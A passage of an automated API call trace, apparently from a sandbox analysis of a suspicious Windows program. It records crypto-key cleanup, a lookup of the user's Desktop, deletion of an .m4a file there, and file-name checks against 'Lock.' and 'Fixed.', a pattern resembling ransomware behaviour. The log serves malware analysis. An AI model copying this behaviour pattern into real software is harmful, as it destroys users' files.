lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0100.944] CryptDestroyKey (hKey=0x9a4440) returned 1 [0100.944] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0100.944] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0100.944] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0100.944] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0100.944] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.944] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.944] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0100.944] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0100.944] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0100.944] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0100.944] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.945] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.945] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.945] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.945] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0100.945] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.019] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0101.019] CryptReleaseContext (hProv=0x9beab0, dwFlags=0x0) returned 1 [0101.019] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.019] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.019] FreeLibrary (hLibModule=0x76390000) returned 1 [0101.019] CloseHandle (hObject=0x44c) returned 1 [0101.021] CloseHandle (hObject=0x458) returned 1 [0101.023] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.023] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.023] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/fqpL_g35J.m4a", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\fqpL_g35J.m4a", lpFilePart=0x8cedf4*="fqpL_g35J.m4a") returned 0x25 [0101.023] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\fqpL_g35J.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\fqpl_g35j.m4a")) returned 0x20 [0101.023] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\fqpL_g35J.m4a", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 0x9a3b80 [0101.023] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\fqpL_g35J.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\fqpl_g35j.m4a")) returned 1 [0101.066] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 0 [0101.066] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0101.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75858 | out: hHeap=0x2af0000) returned 1 [0101.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0101.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.066] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0101.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0101.067] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.067] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6290 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0101.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0101.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0101.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0101.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0101.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0101.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0101.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0101.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0101.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75a38 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6290 | out: hHeap=0x2af0000) returned 1 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0101.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0101.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0101.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0101.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4c) returned 0x29eb108 [0101.068] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/fqpL_g35J.m4a", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\fqpL_g35J.m4a", lpFilePart=0x8cf650*="fqpL_g35J.m4a") returned 0x25 [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb108 | out: hHeap=0x2af0000) returned 1 [0101.068] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\fqpL_g35J.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\fqpl_g35j.m4a")) returned 0xffffffff [0101.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75a38 | out: hHeap=0x2af0000) returned 1 [0101.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0101.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.069] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0101.069] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.069] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0101.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0101.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0101.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0101.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0101.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0101.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0101.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i6 iY_C6BkJ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6 iY_C6BkJ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" iY_C6BkJ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iY_C6BkJ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y_C6BkJ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0101.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_C6BkJ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6BkJ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6BkJ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BkJ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kJ.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0101.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0101.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0101.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0101.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0101.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0101.070] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0101.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0101.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0101.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0101.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0101.070] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i6 iY_C6BkJ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6 iY_C6BkJ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" iY_C6BkJ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iY_C6BkJ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y_C6BkJ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_C6BkJ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6BkJ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6BkJ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BkJ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0101.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kJ.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0101.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0101.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0101.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0101.071] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0101.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0101.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0101.071] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0101.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0101.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0101.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0101.072] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0101.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 